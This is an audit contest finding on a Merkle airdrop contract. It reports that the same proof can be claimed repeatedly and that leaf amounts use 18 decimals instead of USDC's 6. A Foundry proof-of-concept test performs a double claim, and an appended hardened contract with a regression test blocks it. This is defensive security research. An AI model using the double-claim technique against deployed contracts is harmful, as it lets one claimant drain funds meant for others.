Beginner Friendly | DeFi | Foundry
100 EXP
Submission Details
Severity: high
Valid

Eligible user can claim more than the allowable limit

Summary

Vulnerability Details: The Merkle root was generated with amounts expressed in 18 decimals, while the token the protocol intends to airdrop (USDC) uses 6 decimal places. The claim path does not reject a second submission of the same (account, amount, proof) tuple, so a valid leaf can be redeemed more than once.

Impact: A user who is eligible for the airdrop can call `claim` repeatedly with the same proof and receive the airdrop amount each time, taking more than the protocol's allowable limit per user.

Proof of Concept: Place the following into MerkleAirdropTest.t.sol.

function testEligibleUserCanClaim_MultipleTimes() public {
    // The protocol token reports 18 decimals, while USDC uses 6.
    console.log("USDC decimals --- 6");
    console.log("Token decimals ---", token.decimals());
    assert(token.decimals() == 18);

    uint256 startingBalance = token.balanceOf(collectorOne);
    // Fund the claimer with enough ETH to pay the claim fee twice.
    vm.deal(collectorOne, airdrop.getFee() * 2);

    vm.startPrank(collectorOne);
    // Claim the airdrop twice with the same account, amount and proof.
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    airdrop.claim{value: airdrop.getFee()}(
        collectorOne,
        amountToCollect,
        proof
    );
    vm.stopPrank();

    uint256 endingBalance = token.balanceOf(collectorOne);
    console.log("User claims ----", endingBalance / 1e6);
    console.log("Max claims ----", 25);

    // The second claim did not revert: the user received twice the
    // allowable amount.
    assertEq(endingBalance - startingBalance, amountToCollect * 2);
}

Tools Used : Manual Review

Recommendations: The protocol should update the Merkle tree generator so that leaf amounts use the correct number of decimals (6 for USDC, the token the protocol intends to airdrop), and `claim` should record each address that has claimed and reject any further claims from it.
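The following is an added example, not code from the original submission or from the audited protocol. It shows a hardened claim function that records claimed addresses before transferring tokens, encodes leaf amounts in 6-decimal USDC units, and a Foundry regression test asserting that the second claim with the same proof reverts. The contract name, error names, the `i_fee` parameter, the OpenZeppelin double-hashed leaf format `keccak256(bytes.concat(keccak256(abi.encode(account, amount))))`, and the single-leaf tree used in the test (empty proof, root equal to the leaf) are all assumptions made for this illustration and are not taken from the page.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {MerkleProof} from "@openzeppelin/contracts/utils/cryptography/MerkleProof.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

/// Hypothetical hardened airdrop: one claim per address, amounts in USDC units.
contract HardenedMerkleAirdrop {
    using SafeERC20 for IERC20;

    error HardenedMerkleAirdrop__InvalidFee();
    error HardenedMerkleAirdrop__AlreadyClaimed();
    error HardenedMerkleAirdrop__InvalidProof();

    // USDC has 6 decimals; the generator must build leaves with amount * 1e6.
    uint8 public constant USDC_DECIMALS = 6;
    uint256 public constant MAX_CLAIM = 25 * 10 ** USDC_DECIMALS;

    bytes32 private immutable i_merkleRoot;
    IERC20 private immutable i_token;
    uint256 private immutable i_fee; // assumed fixed claim fee in wei
    mapping(address => bool) private s_hasClaimed;

    constructor(bytes32 merkleRoot, IERC20 token, uint256 fee) {
        i_merkleRoot = merkleRoot;
        i_token = token;
        i_fee = fee;
    }

    function claim(address account, uint256 amount, bytes32[] calldata proof) external payable {
        if (msg.value != i_fee) revert HardenedMerkleAirdrop__InvalidFee();
        // Reject repeat claims before doing any work.
        if (s_hasClaimed[account]) revert HardenedMerkleAirdrop__AlreadyClaimed();
        // Assumed OpenZeppelin-style double-hashed leaf over (account, amount).
        bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
        if (!MerkleProof.verify(proof, i_merkleRoot, leaf)) revert HardenedMerkleAirdrop__InvalidProof();
        // Effects before interactions: mark claimed, then transfer.
        s_hasClaimed[account] = true;
        i_token.safeTransfer(account, amount);
    }

    function hasClaimed(address account) external view returns (bool) {
        return s_hasClaimed[account];
    }
}

/// Constructed 6-decimal token standing in for USDC in the test.
contract MockUSDC is ERC20 {
    constructor() ERC20("Mock USDC", "USDC") {
        _mint(msg.sender, 1_000_000 * 1e6);
    }

    function decimals() public pure override returns (uint8) {
        return 6;
    }
}

contract HardenedMerkleAirdropTest is Test {
    HardenedMerkleAirdrop airdrop;
    MockUSDC usdc;
    address user = makeAddr("user");
    uint256 constant FEE = 1e9;
    uint256 amount = 25 * 1e6; // 25 USDC expressed in 6-decimal units
    bytes32[] proof; // empty proof: single-leaf tree, root == leaf

    function setUp() public {
        usdc = new MockUSDC();
        bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(user, amount))));
        airdrop = new HardenedMerkleAirdrop(leaf, usdc, FEE);
        // Fund the airdrop with enough for two payouts so only the guard stops a double claim.
        usdc.transfer(address(airdrop), amount * 2);
        vm.deal(user, 1 ether);
    }

    function testSecondClaimReverts() public {
        vm.startPrank(user);
        airdrop.claim{value: FEE}(user, amount, proof);
        vm.expectRevert(HardenedMerkleAirdrop.HardenedMerkleAirdrop__AlreadyClaimed.selector);
        airdrop.claim{value: FEE}(user, amount, proof);
        vm.stopPrank();

        assertEq(usdc.balanceOf(user), amount);
        assertTrue(airdrop.hasClaimed(user));
    }
}
```

The guard is keyed on the account rather than on the leaf hash so that the same address cannot claim twice even if the generator accidentally emitted two leaves for it; if a protocol intends several distinct allocations per address, key the mapping on the leaf instead.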

Updates

Lead Judging Commences

inallhonesty Lead Judge
over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

multi-claim-airdrop
